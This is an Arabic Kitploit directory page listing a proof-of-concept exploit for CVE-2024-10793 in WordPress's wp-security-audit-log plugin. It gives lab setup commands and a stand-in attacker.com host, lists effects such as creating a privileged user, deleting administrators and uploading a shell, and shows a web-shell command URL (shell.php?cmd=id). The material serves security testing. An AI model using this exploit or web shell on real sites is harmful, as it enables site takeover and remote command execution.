Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-10793 — استغلال إثبات المفهوم لثغرة CVE-2024-10793 التي تستهدف إضافة wp-security-audit-log في WordPress. يوضح الاستيلاء على الحساب وإنشاء مستخدم مميز وتحميل shell والتلاعب الإداري عبر طلبات HTTP مصممة. | Kitploit
أدوات/GitHubGitHub/mahajian/cve-2024-10793
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويبتطوير الحمولات
GitHubmahajian/cve-2024-10793

CVE-2024-10793

استغلال إثبات المفهوم لثغرة CVE-2024-10793 التي تستهدف إضافة wp-security-audit-log في WordPress. يوضح الاستيلاء على الحساب وإنشاء مستخدم مميز وتحميل shell والتلاعب الإداري عبر طلبات HTTP مصممة.

عرض المستودع
211منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-10793 PoC

أضف هذه الأسطر إلى ملف hosts الخاص بك:

root@kitploit:~
127.0.0.1  goodcms.lab
127.0.0.1  attacker.com

قم بتشغيل WordPress باستخدام docker:

root@kitploit:~
$ sudo systemctl start docker
$ sudo docker-compose up -d

افتح http://goodcms.lab:2121 ونفّذ خطوات تثبيت WordPress. ثبّت wp-security-audit-log.5.2.1 أو إصدارات أقدم في WordPress.

قم بتشغيل خادم المهاجم:

root@kitploit:~
$ php -S 0:9091 -t ./exploit

أرسل http://attacker.com إلى الضحية وبذلك تكون قد نجحت!

تأثيرات الاستغلال:

  • إضافة مستخدم بصلاحيات مرتفعة.
  • تعديل الملف الشخصي للمسؤول الحالي
  • حذف جميع المسؤولين باستثناء الهاكر :)
  • رفع شيل
  • تسجيل الخروج

alt text

الاستيلاء على الحساب وإنشاء مستخدم بصلاحيات مرتفعة - PoC: بيانات اعتماد المهاجم بعد الاستغلال: { email: [email protected], username: amin, password: 123456 } (يمكنك تغييرها من كود xpl.js.)

نفّذ أمر الشيل: http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id

alt text

تنزيل الأداة